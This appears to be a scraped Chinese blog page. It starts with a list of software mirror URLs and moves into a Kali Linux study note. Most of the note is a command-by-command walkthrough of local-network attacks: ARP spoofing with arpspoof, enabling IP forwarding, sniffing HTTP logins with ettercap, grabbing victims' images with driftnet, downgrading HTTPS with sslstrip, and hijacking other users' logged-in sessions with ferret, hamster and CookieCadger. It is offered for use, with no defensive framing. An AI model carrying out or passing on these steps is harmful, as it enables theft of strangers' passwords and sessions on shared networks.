1.eclipse
中国科技大学:http://mirrors.ustc.edu.cn/eclipse/
×××:http://mirrors.opencas.cn/eclipse/
东北大学:http://ftp.neu.edu.cn/mirrors/eclipse/http://mirror.neu.edu.cn/eclipse/

2.安卓SDK
×××:http://mirrors.opencas.ac.cn/android/repository/
南洋理工学院:http://mirror.nyist.edu.cn/android/repository/
×××:http://mirrors.opencas.cn/android/repository/
腾讯:http://android-mirror.bugly.qq.com:8080/android/repository/(限流,不推荐)
大连东软信息学院:http://mirrors.neusoft.edu.cn/android/repository/(同步效果不如中科院的镜像,不推荐)

3.Xcode
腾讯:http://android-mirror.bugly.qq.com:8080/Xcode/(从7.2之后不再更新,建议直接从官网下载)

三、官方镜像列表状态地址
CentOS:http://mirror-status.centos.org/#cn
Archlinux:https://www.archlinux.org/mirrors/status/
Ubuntu:https://launchpad.net/ubuntu/+cdmirrors
Debian:http://mirror.debian.org/status.html
Fedora Linux/Fedora EPEL:https://admin.fedoraproject.org/mirrormanager/mirrors
Apache:http://www.apache.org/mirrors/#cn

Cygwin:https://www.cygwin.com/mirrors.html


自己学习笔记用的,大家可以多多添加

转载于:https://blog.51cto.com/douer/1923646

Kali

2017-05-09 11:41:00 weixin_30670151 阅读数 13
安装kali双系统
安装过程中,若出现无法挂载光盘,可以拔掉U盘,换个USB插口再试!!!!!!!!!
 
 

http://www.ichunqiu.com/search/kali

 
 
 
下载官方Kali IOS镜像文件(推荐32位)
使用vm进行虚拟机的安装
 
使用桥接模式,再配置静态IP
 
service apache2 start  
修改网关
 
使kali能够使用ssh连接
http://jingyan.baidu.com/article/eae07827a3e6bc1fec5485e3.html
 
选择图像安装 graphcal install
 
1 .安装vmtools工具
虚拟机中安装vmtools工具
解压文件 tar zxvf 文件名   (tab键自动补全)
进入目录  ./绿色文件 开始安装 
安装完成删除文件,rm 文件名  rm -r 文件夹名 (递归把文件夹删除)
 
 
2.系统更新  更新源
leafpad /etc/apt/sources.list
 
百度网上找些更新源
 
apt-get update  更新操作
apt-get dist-upgrade  安装操作
 
 
3.桌面美化
 
apt-get install kde-full
 
使用putty 或ssh工具连接 
http://jingyan.baidu.com/article/eae07827a3e6bc1fec5485e3.html?qq-pf-to=pcqq.c2c
 
字符重叠问题
  apt-get install ttf-wqy-microhei ttf-wqy-zenhei 
 
-----基本操作命令
dir ls 列目录
sqlmap相当于明小子 阿D工具 NBSI等注入工具
ettercap  欺骗工具
 
find / -name sqlmap 查找命令 (指从根目录查找sqlmap名字的)
 
ifconfig查看IP
ifconfig -a 
ifconfig -help
 
端口扫描
nmap -sS 10.70.40.246
 
windows美化,雨滴
酷鱼
雨滴
 
局域网断网攻击
arp攻击
使用rpspoof工具
 
arpspoof -h --c查看参数
arpspoof -i 网卡 -t 目标IP 网关
(
查看自己的网卡 ifconfig
 
网关:目标的网关 192.168.65.2
)
怎么看局域网当中的IP
 
fping -asg 192.168.65.0/24
 
windows 查看 局域网主机  net view
可以看到每台主机名  然后用  ping -4  主机名 就可以得到ip
http://jingyan.baidu.com/article/870c6fc332ad88b03fe4bea3.html
 
ARP断网其实是错误的配置,导致目标IP的流量经过我网卡
 
获取内网
别人浏览过的图片
ARP欺骗,目标的IP流量经过我的网卡从网关出去
 
arpspoof -i eth0 -t 192.168.65.128 192.168.65.2
 
arpspoof -i eth0 -t 10.70.40.18 10.70.40.1
 
 
进行IP流量转发
 
echo 1 >/proc/sys/net/ipv4/ip_forward
 
重启下网络服务
/etc/init.d/networking restart
 
 
(若想回到断网攻击状态需要 echo 0)
echo 写命令是不会有回显的。
写入之后使用
arpspoof -i 网卡 -t 目标IP 网关
此时arp成功欺骗,不会出现断网情况
 
ARP欺骗 
欺骗之后,使用
ettercap -Tq -i eth0 嗅探
但是这种欺骗只能得到http协议下的帐号密码
当目标机器登录网站,
将可以得到目标登录的网站和帐号密码
当用户名是中文,需要转下编码
 
获取本机网卡的图片
 
查看我的网卡的图片信息
driftnet -i eth0(这个需要在机器上才能打开,用ssh工具不可以)
在黑窗口中变会显示,目标机器访问的图片,并会保存下来。(在 /root/文件夹下)
 
 
HTTP用户名密码的获取
但是这种欺骗只能得到http协议下的帐号密码
ettercap攻击  欺骗 DNS欺骗 浏览嗅探
ettercap -Tq -i eth0 嗅探 欺骗之后嗅探
-Tq启动文本模式
-i 加网卡
cat /proc/sys/net/ipv4/ip_forward   查看文本
 
HTTPS用户名密码的获取
sslstrip工具
 
vim文本编辑器,
esc shift+:    q!不保存推出   wq
 
vim /etc/ettercap/etter.conf
 
去掉iptabiles 下面的 redir_ 前面的#号(两个)
shift+:  wq!保存
设置
sslstrip功能能够把https的连接还原为http
sslstrip -a -f -k
欺骗 
arpspoof -i eth0 -t 192.168.65.128 192.168.65.2
嗅探
ettercap -Tq -i eth0
 
https缺点 容易出现证书错误(根据浏览器)
 
会话劫持(登录别人登录过的网站)
arpspoof 
wireshark  抓包(只能在虚拟机里面使用)
ferret 重新生成抓包后的文件
 hamster 重放流量
 
方法一:
先欺骗,
wireshark
抓包 (选择网卡),另存为pcap文件,生成一个pcap文件
 
进到文件保存目录
ferret -r  cookies.pcap
目录下就会多一个txt文件
 
hamster
 
 
修改浏览器的代理为本地的  edit->Preferences->Advenced->netWork->setting 

 
enter 保存
在虚拟机浏览器中访问127.0.0.1:1234
 
然后就可以在里面找你的想登陆的网站了。。
 
将txt文件保存到root文件夹中
cp hamster.txt /root/
 
-- 方法二:
ferret -i eth0
hamster 
然后在目标机器上访问了网站之后便可以在  127.0.0.1:1234 这个地址,点击 ap** 选择 eth0就可以发现有了。
这是实时的检测,,很好玩
只能监测通过你的eth0网卡的流量,,所以想要劫持别人的,需要欺骗
 
 
一键劫持用户会话
需要工具  CookieCadger-1.08.jar 在百度云盘里哈
 
命令行打开 .jar文件,进到文件目录 Java -jar CookieCadger-1.08.jar
选 yes
选你想要监听的网卡  eth0
然后这边如果开启了代理,需要将浏览器代理关掉 
 
 
-----------------------------------------------------------------------------------------
 
fiddler 进行抓包改包操作
若抓不了谷歌的包可能是由于浏览器添加了其他代理导致的,卸载就好了
 
开启之后便可以对浏览器的数据进行抓包操作
 
断点改包  
 
在命令行 输入 bpafter url
保证 
这里是这样的,代表在发送数据包前拦截 ,然后请求便会停止并等待,然后在右边便是数据包文了。便可以进行修改数据包操作,然后在
 
修改之后,点击这个绿色的按钮,继续发送操作便可以实现拉阿拉
 
 
 
http://m.baidu.com/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%400%2Csz%401320_1001%2Cta%40iphone_2_5.1_3_537/baiduid=B23722CE84BAEF1B0B4047E16AAF01BD/w=0_10_wifislax+%E9%92%93%E9%B1%BC/t=iphone/l=3/tc?ref=www_iphone&lid=14859882688158086667&order=1&vit=osres&tj=www_normal_1_0_10_title&m=8&srd=1&cltj=cloud_title&dict=30&nt=wnor&title=wifislax%E4%B8%AD%E7%9A%84linset%E8%BD%AF%E4%BB%B6%E9%92%93%E9%B1%BC%E6%95%99%E7%A8%8B&sec=12682&di=664323e8cd280a27&bdenc=1&tch=124.1464778239746.55.185.0.0&tch=124.460.29.146.1.133&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IEQGG_yFZ0z3xokmyxP4kHREsRDb6NnTLJ5DhxWeCvB9DwXOi0mYskNYWgK&eqid=ce38e892e7a3b80010000006574ebdf8&wd=&clk_info=%7B%22srcid%22%3A%22www_normal%22%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1464779416637%2C%22xpath%22%3A%22div-div-div-a-div-img%22%7D
 
 
 



转载于:https://www.cnblogs.com/kinmos/p/6829858.html